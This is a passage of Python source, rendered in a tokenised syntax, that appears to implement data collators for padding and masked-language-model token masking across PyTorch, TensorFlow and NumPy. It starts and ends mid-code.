max_length=max(x.size(0)<for>x examples)<if_stmt>pad_to_multiple_of<is><not><none><and>(max_length%pad_to_multiple_of<ne>0)<block_start>max_length=((max_length<floordiv>pad_to_multiple_of)+1)<times>pad_to_multiple_of<block_end>result=examples[0].new_full([len(examples) max_length] tokenizer.pad_token_id)<for_stmt>i,example enumerate(examples)<block_start><if_stmt>tokenizer.padding_side<eq>"right"<block_start>result[i :example.shape[0]]=example<block_end><else_stmt><block_start>result[i -example.shape[0]:]=example<block_end><block_end><return>result<block_end># TensorFlow twin of _torch_collate_batch: pads each example with tf.pad instead of a preallocated tensor. <def_stmt>_tf_collate_batch examples tokenizer pad_to_multiple_of:Optional[int]=<none><block_start><import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<line_sep>"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""<line_sep># Tensorize if necessary. <if_stmt>isinstance(examples[0] (list tuple))<block_start>examples=[tf.convert_to_tensor(e dtype=tf.int64)<for>e examples]<block_end># Check if padding is necessary. length_of_first=len(examples[0])<line_sep>are_tensors_same_length=all(len(x)<eq>length_of_first<for>x examples)<if_stmt>are_tensors_same_length<and>(pad_to_multiple_of<is><none><or>length_of_first%pad_to_multiple_of<eq>0)<block_start><return>tf.stack(examples axis=0)<block_end># If yes, check if we have a `pad_token`. <if_stmt>tokenizer._pad_token<is><none><block_start><raise>ValueError("You are attempting to pad samples but the tokenizer you are using"<concat>f" ({tokenizer.__class__.__name__}) does not have a pad token.")<block_end># Creating the full tensor and filling it with our data. 
max_length=max(len(x)<for>x examples)<if_stmt>pad_to_multiple_of<is><not><none><and>(max_length%pad_to_multiple_of<ne>0)<block_start>max_length=((max_length<floordiv>pad_to_multiple_of)+1)<times>pad_to_multiple_of<block_end># result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id) result=[]<line_sep>rank=tf.rank(examples[0])<line_sep>paddings=np.zeros((rank 2) dtype=np.int32)<for_stmt>example examples<block_start><if_stmt>tokenizer.padding_side<eq>"right"<block_start>paddings[0 1]=max_length-len(example)<block_end><else_stmt><block_start>paddings[0 0]=max_length-len(example)<block_end>result.append(tf.pad(example paddings constant_values=tokenizer.pad_token_id))<block_end><return>tf.stack(result axis=0)<block_end># NumPy twin of _torch_collate_batch: fills a pre-sized np.full array with the pad token. <def_stmt>_numpy_collate_batch examples tokenizer pad_to_multiple_of:Optional[int]=<none><block_start><import_stmt>numpy<as>np<line_sep>"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""<line_sep># Tensorize if necessary. <if_stmt>isinstance(examples[0] (list tuple))<block_start>examples=[np.array(e dtype=np.int64)<for>e examples]<block_end># Check if padding is necessary. length_of_first=len(examples[0])<line_sep>are_tensors_same_length=all(len(x)<eq>length_of_first<for>x examples)<if_stmt>are_tensors_same_length<and>(pad_to_multiple_of<is><none><or>length_of_first%pad_to_multiple_of<eq>0)<block_start><return>np.stack(examples axis=0)<block_end># If yes, check if we have a `pad_token`. <if_stmt>tokenizer._pad_token<is><none><block_start><raise>ValueError("You are attempting to pad samples but the tokenizer you are using"<concat>f" ({tokenizer.__class__.__name__}) does not have a pad token.")<block_end># Creating the full tensor and filling it with our data. 
max_length=max(len(x)<for>x examples)<if_stmt>pad_to_multiple_of<is><not><none><and>(max_length%pad_to_multiple_of<ne>0)<block_start>max_length=((max_length<floordiv>pad_to_multiple_of)+1)<times>pad_to_multiple_of<block_end>result=np.full(shape=(len(examples) max_length) fill_value=tokenizer.pad_token_id dtype=examples[0].dtype)<for_stmt>i,example enumerate(examples)<block_start><if_stmt>tokenizer.padding_side<eq>"right"<block_start>result[i :example.shape[0]]=example<block_end><else_stmt><block_start>result[i -example.shape[0]:]=example<block_end><block_end><return>result<block_end># Best-effort conversion of list/np/tf/torch sequences to a plain Python list. <def_stmt>tolist x<block_start><if_stmt>isinstance(x list)<block_start><return>x<block_end><elif_stmt>hasattr(x "numpy")# Checks for TF tensors without needing the import <block_start>x=x.numpy()<block_end><return>x.tolist()<block_end>@dataclass<class_stmt>DataCollatorForSeq2Seq<block_start>""" Data collator that will dynamically pad the inputs received, as well as the labels. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. model ([`PreTrainedModel`]): The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to prepare the *decoder_input_ids* This is useful when using *label_smoothing* to avoid calculating loss twice. padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`): Select a strategy to pad the returned sequences (according to the model's padding side and padding index) among: - `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence is provided). - `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum acceptable input length for the model if that argument is not provided. - `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different lengths). 
max_length (`int`, *optional*): Maximum length of the returned list and optionally padding length (see above). pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta). label_pad_token_id (`int`, *optional*, defaults to -100): The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions). return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>model:Optional[Any]=<none><line_sep>padding:Union[bool str PaddingStrategy]=<true><line_sep>max_length:Optional[int]=<none><line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>label_pad_token_id:int=-100<line_sep>return_tensors:str="pt"<line_sep># Pad "labels" by hand (tokenizer.pad does not pad them), then delegate the remaining keys to tokenizer.pad. <def_stmt>__call__ self features return_tensors=<none><block_start><import_stmt>numpy<as>np<if_stmt>return_tensors<is><none><block_start>return_tensors=self.return_tensors<block_end>labels=[feature["labels"]<for>feature features]<if>"labels"<in>features[0].keys()<else><none><line_sep># We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the # same length to return tensors. 
<if_stmt>labels<is><not><none><block_start>max_label_length=max(len(l)<for>l labels)<if_stmt>self.pad_to_multiple_of<is><not><none><block_start>max_label_length=((max_label_length+self.pad_to_multiple_of-1)<floordiv>self.pad_to_multiple_of<times>self.pad_to_multiple_of)<block_end>padding_side=self.tokenizer.padding_side<for_stmt>feature features<block_start>remainder=[self.label_pad_token_id]<times>(max_label_length-len(feature["labels"]))<if_stmt>isinstance(feature["labels"] list)<block_start>feature["labels"]=(feature["labels"]+remainder<if>padding_side<eq>"right"<else>remainder+feature["labels"])<block_end><elif_stmt>padding_side<eq>"right"<block_start>feature["labels"]=np.concatenate([feature["labels"] remainder]).astype(np.int64)<block_end><else_stmt><block_start>feature["labels"]=np.concatenate([remainder feature["labels"]]).astype(np.int64)<block_end><block_end><block_end># Now that every "labels" entry shares one length, the tokenizer can pad the remaining keys. features=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of return_tensors=return_tensors )<line_sep># prepare decoder_input_ids <if_stmt>(labels<is><not><none><and>self.model<is><not><none><and>hasattr(self.model "prepare_decoder_input_ids_from_labels"))<block_start>decoder_input_ids=self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])<line_sep>features["decoder_input_ids"]=decoder_input_ids<block_end><return>features<block_end><block_end>@dataclass<class_stmt>DataCollatorForLanguageModeling(DataCollatorMixin)<block_start>""" Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they are not all of the same length. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. mlm (`bool`, *optional*, defaults to `True`): Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs with the padding tokens ignored (by setting them to -100). 
Otherwise, the labels are -100 for non-masked tokens and the value to predict for the masked token. mlm_probability (`float`, *optional*, defaults to 0.15): The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`. pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". <Tip> For best performance, this data collator should be used with a dataset having items that are dictionaries or BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a [`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`. </Tip>"""<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>mlm:bool=<true><line_sep>mlm_probability:float=0.15<line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>tf_experimental_compile:bool=<false><line_sep>return_tensors:str="pt"<line_sep># Validate the mlm/mask-token combination early and optionally XLA-compile the TF masking path. <def_stmt>__post_init__ self<block_start><if_stmt>self.mlm<and>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. "<concat>"You should pass `mlm=False` to train on causal language modeling instead.")<block_end><if_stmt>self.tf_experimental_compile<block_start><import_stmt>tensorflow<as>tf<line_sep>self.tf_mask_tokens=tf.function(self.tf_mask_tokens jit_compile=<true>)<block_end><block_end># Draw an elementwise Bernoulli(probability) boolean tensor of the given shape. @staticmethod<def_stmt>tf_bernoulli shape probability<block_start><import_stmt>tensorflow<as>tf<line_sep>prob_matrix=tf.fill(shape probability)<line_sep><return>tf.cast(prob_matrix-tf.random.uniform(shape 0 1)<ge>0 tf.bool)<block_end><def_stmt>tf_mask_tokens self inputs:Any vocab_size mask_token_id special_tokens_mask:Optional[Any]=<none><arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. 
"""<import_stmt>tensorflow<as>tf<line_sep>input_shape=tf.shape(inputs)<line_sep># 1 for a special token, 0 for a normal token in the special tokens mask # We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`) masked_indices=self.tf_bernoulli(input_shape self.mlm_probability)&~special_tokens_mask<line_sep># Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens labels=tf.where(masked_indices inputs -100)<line_sep># 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=self.tf_bernoulli(input_shape 0.8)&masked_indices<line_sep>inputs=tf.where(indices_replaced mask_token_id inputs)<line_sep># 10% of the time, we replace masked input tokens with random word # NOTE(review): 0.1 here is an independent draw ANDed with ~indices_replaced (net ~2% of masked tokens), while the torch path uses 0.5 conditioned the same way (net 10%) -- confirm the intended parity. indices_random=self.tf_bernoulli(input_shape 0.1)&masked_indices&~indices_replaced<line_sep>random_words=tf.random.uniform(input_shape maxval=vocab_size dtype=tf.int64)<line_sep>inputs=tf.where(indices_random random_words inputs)<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end># TensorFlow batching entry point: pad, then apply MLM masking or derive causal-LM labels. <def_stmt>tf_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><import_stmt>tensorflow<as>tf<line_sep># Handle dict or lists with proper padding and conversion to tensor. <if_stmt>isinstance(examples[0] Mapping)<block_start>batch=self.tokenizer.pad(examples return_tensors="tf" pad_to_multiple_of=self.pad_to_multiple_of)<block_end><else_stmt><block_start>batch={"input_ids":_tf_collate_batch(examples self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)}<block_end># If special token mask has been preprocessed, pop it from the dict. 
special_tokens_mask=batch.pop("special_tokens_mask" <none>)<if_stmt>self.mlm<block_start><if_stmt>special_tokens_mask<is><none><block_start>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val batch["input_ids"].numpy().tolist()]<line_sep># Cannot directly create as bool special_tokens_mask=tf.cast(tf.convert_to_tensor(special_tokens_mask dtype=tf.int64) tf.bool)<block_end><else_stmt><block_start>special_tokens_mask=tf.cast(special_tokens_mask tf.bool)<block_end>batch["input_ids"],batch["labels"]=self.tf_mask_tokens(tf.cast(batch["input_ids"] tf.int64) special_tokens_mask=special_tokens_mask mask_token_id=self.tokenizer.mask_token_id vocab_size=len(self.tokenizer) )<block_end><else_stmt><block_start>labels=batch["input_ids"]<if_stmt>self.tokenizer.pad_token_id<is><not><none># Replace self.tokenizer.pad_token_id with -100 <block_start>labels=tf.where(labels<eq>self.tokenizer.pad_token_id -100 labels)<block_end><else_stmt><block_start>labels=tf.identity(labels)# Makes a copy, just in case <block_end>batch["labels"]=labels<block_end><return>batch<block_end># PyTorch batching entry point, mirroring tf_call. <def_stmt>torch_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]# Handle dict or lists with proper padding and conversion to tensor. <block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>batch=self.tokenizer.pad(examples return_tensors="pt" pad_to_multiple_of=self.pad_to_multiple_of)<block_end><else_stmt><block_start>batch={"input_ids":_torch_collate_batch(examples self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)}<block_end># If special token mask has been preprocessed, pop it from the dict. 
special_tokens_mask=batch.pop("special_tokens_mask" <none>)<if_stmt>self.mlm<block_start>batch["input_ids"],batch["labels"]=self.torch_mask_tokens(batch["input_ids"] special_tokens_mask=special_tokens_mask)<block_end><else_stmt><block_start>labels=batch["input_ids"].clone()<if_stmt>self.tokenizer.pad_token_id<is><not><none><block_start>labels[labels<eq>self.tokenizer.pad_token_id]=-100<block_end>batch["labels"]=labels<block_end><return>batch<block_end><def_stmt>torch_mask_tokens self inputs:Any special_tokens_mask:Optional[Any]=<none><arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. """<import_stmt>torch<line_sep>labels=inputs.clone()<line_sep># We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`) probability_matrix=torch.full(labels.shape self.mlm_probability)<if_stmt>special_tokens_mask<is><none><block_start>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>special_tokens_mask=torch.tensor(special_tokens_mask dtype=torch.bool)<block_end><else_stmt><block_start>special_tokens_mask=special_tokens_mask.bool()<block_end>probability_matrix.masked_fill_(special_tokens_mask value=0.0)<line_sep>masked_indices=torch.bernoulli(probability_matrix).bool()<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=torch.bernoulli(torch.full(labels.shape 0.8)).bool()&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word (0.5 of the remaining 20% of masked tokens = 10% overall) indices_random=torch.bernoulli(torch.full(labels.shape 0.5)).bool()&masked_indices&~indices_replaced<line_sep>random_words=torch.randint(len(self.tokenizer) labels.shape 
dtype=torch.long)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end># NumPy batching entry point, mirroring torch_call. <def_stmt>numpy_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><import_stmt>numpy<as>np<line_sep># Handle dict or lists with proper padding and conversion to tensor. <if_stmt>isinstance(examples[0] Mapping)<block_start>batch=self.tokenizer.pad(examples return_tensors="np" pad_to_multiple_of=self.pad_to_multiple_of)<block_end><else_stmt><block_start>batch={"input_ids":_numpy_collate_batch(examples self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)}<block_end># If special token mask has been preprocessed, pop it from the dict. special_tokens_mask=batch.pop("special_tokens_mask" <none>)<if_stmt>self.mlm<block_start>batch["input_ids"],batch["labels"]=self.numpy_mask_tokens(batch["input_ids"] special_tokens_mask=special_tokens_mask)<block_end><else_stmt><block_start>labels=np.copy(batch["input_ids"])<if_stmt>self.tokenizer.pad_token_id<is><not><none><block_start>labels[labels<eq>self.tokenizer.pad_token_id]=-100<block_end>batch["labels"]=labels<block_end><return>batch<block_end><def_stmt>numpy_mask_tokens self inputs:Any special_tokens_mask:Optional[Any]=<none><arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. 
"""<import_stmt>numpy<as>np<line_sep>labels=np.copy(inputs)<line_sep># We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`) probability_matrix=np.full(labels.shape self.mlm_probability)<if_stmt>special_tokens_mask<is><none><block_start>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>special_tokens_mask=np.array(special_tokens_mask dtype=np.bool)<block_end><else_stmt><block_start>special_tokens_mask=special_tokens_mask.astype(np.bool)<block_end>probability_matrix[special_tokens_mask]=0<line_sep># Numpy doesn't have bernoulli, so we use a binomial with 1 trial masked_indices=np.random.binomial(1 probability_matrix size=probability_matrix.shape).astype(np.bool)<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=np.random.binomial(1 0.8 size=labels.shape).astype(np.bool)&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.mask_token_id<line_sep># 10% of the time, we replace masked input tokens with random word # indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced indices_random=(np.random.binomial(1 0.5 size=labels.shape).astype(np.bool)&masked_indices&~indices_replaced)<line_sep>random_words=np.random.randint(low=0 high=len(self.tokenizer) size=np.count_nonzero(indices_random) dtype=np.int64)<line_sep>inputs[indices_random]=random_words<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><block_end>@dataclass<class_stmt>DataCollatorForWholeWordMask(DataCollatorForLanguageModeling)<block_start>""" Data collator used for language modeling that masks entire words. 
- collates batches of tensors, honoring their tokenizer's pad_token - preprocesses batches for masked language modeling <Tip> This collator relies on details of the implementation of subword tokenization by [`BertTokenizer`], specifically that subword tokens are prefixed with *##*. For tokenizers that do not adhere to this scheme, this collator will produce an output that is roughly equivalent to [`.DataCollatorForLanguageModeling`]. </Tip>"""<line_sep># Build whole-word mask labels from examples (optionally using "chinese_ref" sub-word annotations), then mask. <def_stmt>torch_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>input_ids=[e["input_ids"]<for>e examples]<block_end><else_stmt><block_start>input_ids=examples<line_sep>examples=[{"input_ids":e}<for>e examples]<block_end>batch_input=_torch_collate_batch(input_ids self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>mask_labels=[]<for_stmt>e examples<block_start>ref_tokens=[]<for_stmt>id tolist(e["input_ids"])<block_start>token=self.tokenizer._convert_id_to_token(id)<line_sep>ref_tokens.append(token)<block_end># For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢] <if_stmt>"chinese_ref"<in>e<block_start>ref_pos=tolist(e["chinese_ref"])<line_sep>len_seq=len(e["input_ids"])<for_stmt>i range(len_seq)<block_start><if_stmt>i<in>ref_pos<block_start>ref_tokens[i]="##"+ref_tokens[i]<block_end><block_end><block_end>mask_labels.append(self._whole_word_mask(ref_tokens))<block_end>batch_mask=_torch_collate_batch(mask_labels self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>inputs,labels=self.torch_mask_tokens(batch_input batch_mask)<line_sep><return>{"input_ids":inputs "labels":labels}<block_end># TensorFlow twin of torch_call above. <def_stmt>tf_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>input_ids=[e["input_ids"]<for>e examples]<block_end><else_stmt><block_start>input_ids=examples<line_sep>examples=[{"input_ids":e}<for>e 
examples]<block_end>batch_input=_tf_collate_batch(input_ids self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>mask_labels=[]<for_stmt>e examples<block_start>ref_tokens=[]<for_stmt>id tolist(e["input_ids"])<block_start>token=self.tokenizer._convert_id_to_token(id)<line_sep>ref_tokens.append(token)<block_end># For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢] <if_stmt>"chinese_ref"<in>e<block_start>ref_pos=tolist(e["chinese_ref"])<line_sep>len_seq=len(e["input_ids"])<for_stmt>i range(len_seq)<block_start><if_stmt>i<in>ref_pos<block_start>ref_tokens[i]="##"+ref_tokens[i]<block_end><block_end><block_end>mask_labels.append(self._whole_word_mask(ref_tokens))<block_end>batch_mask=_tf_collate_batch(mask_labels self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>inputs,labels=self.tf_mask_tokens(batch_input batch_mask)<line_sep><return>{"input_ids":inputs "labels":labels}<block_end># NumPy twin of torch_call above. <def_stmt>numpy_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>input_ids=[e["input_ids"]<for>e examples]<block_end><else_stmt><block_start>input_ids=examples<line_sep>examples=[{"input_ids":e}<for>e examples]<block_end>batch_input=_numpy_collate_batch(input_ids self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>mask_labels=[]<for_stmt>e examples<block_start>ref_tokens=[]<for_stmt>id tolist(e["input_ids"])<block_start>token=self.tokenizer._convert_id_to_token(id)<line_sep>ref_tokens.append(token)<block_end># For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢] <if_stmt>"chinese_ref"<in>e<block_start>ref_pos=tolist(e["chinese_ref"])<line_sep>len_seq=len(e["input_ids"])<for_stmt>i 
range(len_seq)<block_start><if_stmt>i<in>ref_pos<block_start>ref_tokens[i]="##"+ref_tokens[i]<block_end><block_end><block_end>mask_labels.append(self._whole_word_mask(ref_tokens))<block_end>batch_mask=_numpy_collate_batch(mask_labels self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>inputs,labels=self.numpy_mask_tokens(batch_input batch_mask)<line_sep><return>{"input_ids":inputs "labels":labels}<block_end><def_stmt>_whole_word_mask self input_tokens:List[str] max_predictions=512<block_start>""" Get 0/1 labels for masked tokens with whole word mask proxy """<if_stmt><not>isinstance(self.tokenizer (BertTokenizer BertTokenizerFast))<block_start>warnings.warn("DataCollatorForWholeWordMask is only suitable for BertTokenizer-like tokenizers. "<concat>"Please refer to the documentation for more information.")<block_end># Group token indices into whole-word candidates: a "##" continuation joins the previous word. cand_indexes=[]<for_stmt>(i token) enumerate(input_tokens)<block_start><if_stmt>token<eq>"[CLS]"<or>token<eq>"[SEP]"<block_start><continue><block_end><if_stmt>len(cand_indexes)<ge>1<and>token.startswith("##")<block_start>cand_indexes[-1].append(i)<block_end><else_stmt><block_start>cand_indexes.append([i])<block_end><block_end>random.shuffle(cand_indexes)<line_sep>num_to_predict=min(max_predictions max(1 int(round(len(input_tokens)<times>self.mlm_probability))))<line_sep>masked_lms=[]<line_sep>covered_indexes=set()<for_stmt>index_set cand_indexes<block_start><if_stmt>len(masked_lms)<ge>num_to_predict<block_start><break><block_end># If adding a whole-word mask would exceed the maximum number of # predictions, then just skip this candidate. 
<if_stmt>len(masked_lms)+len(index_set)<g>num_to_predict<block_start><continue><block_end>is_any_index_covered=<false><for_stmt>index index_set<block_start><if_stmt>index<in>covered_indexes<block_start>is_any_index_covered=<true><line_sep><break><block_end><block_end><if_stmt>is_any_index_covered<block_start><continue><block_end><for_stmt>index index_set<block_start>covered_indexes.add(index)<line_sep>masked_lms.append(index)<block_end><block_end><if_stmt>len(covered_indexes)<ne>len(masked_lms)<block_start><raise>ValueError("Length of covered_indexes is not equal to length of masked_lms.")<block_end>mask_labels=[1<if>i<in>covered_indexes<else>0<for>i range(len(input_tokens))]<line_sep><return>mask_labels<block_end><def_stmt>torch_mask_tokens self inputs:Any mask_labels:Any<arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref. """<import_stmt>torch<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. 
Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=inputs.clone()<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) probability_matrix=mask_labels<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>probability_matrix.masked_fill_(torch.tensor(special_tokens_mask dtype=torch.bool) value=0.0)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>probability_matrix.masked_fill_(padding_mask value=0.0)<block_end>masked_indices=probability_matrix.bool()<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=torch.bernoulli(torch.full(labels.shape 0.8)).bool()&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=torch.bernoulli(torch.full(labels.shape 0.5)).bool()&masked_indices&~indices_replaced<line_sep>random_words=torch.randint(len(self.tokenizer) labels.shape dtype=torch.long)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><def_stmt>tf_mask_tokens self inputs:Any mask_labels:Any<arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref. 
"""<import_stmt>tensorflow<as>tf<line_sep>input_shape=tf.shape(inputs)<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=tf.identity(inputs)<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) masked_indices=tf.cast(mask_labels tf.bool)<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels]<line_sep>masked_indices=masked_indices&~tf.cast(special_tokens_mask dtype=tf.bool)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=inputs<eq>self.tokenizer.pad_token_id<line_sep>masked_indices=masked_indices&~padding_mask<block_end># Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens labels=tf.where(masked_indices inputs -100)<line_sep># 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=self.tf_bernoulli(input_shape 0.8)&masked_indices<line_sep>inputs=tf.where(indices_replaced self.tokenizer.mask_token_id inputs)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=self.tf_bernoulli(input_shape 0.1)&masked_indices&~indices_replaced<line_sep>random_words=tf.random.uniform(input_shape maxval=len(self.tokenizer) dtype=tf.int64)<line_sep>inputs=tf.where(indices_random random_words inputs)<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><def_stmt>numpy_mask_tokens self inputs:Any mask_labels:Any<arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. 
Set 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref. """<import_stmt>numpy<as>np<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=np.copy(inputs)<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) masked_indices=mask_labels.astype(np.bool)<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>masked_indices[np.array(special_tokens_mask dtype=np.bool)]=0<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels<eq>self.tokenizer.pad_token_id<line_sep>masked_indices[padding_mask]=0<block_end>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=np.random.binomial(1 0.8 size=labels.shape).astype(np.bool)&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word # indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced indices_random=(np.random.binomial(1 0.5 size=labels.shape).astype(np.bool)&masked_indices&~indices_replaced)<line_sep>random_words=np.random.randint(low=0 high=len(self.tokenizer) size=labels.shape dtype=np.int64)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><block_end>@dataclass<class_stmt>DataCollatorForSOP(DataCollatorForLanguageModeling)<block_start>""" Data collator used for 
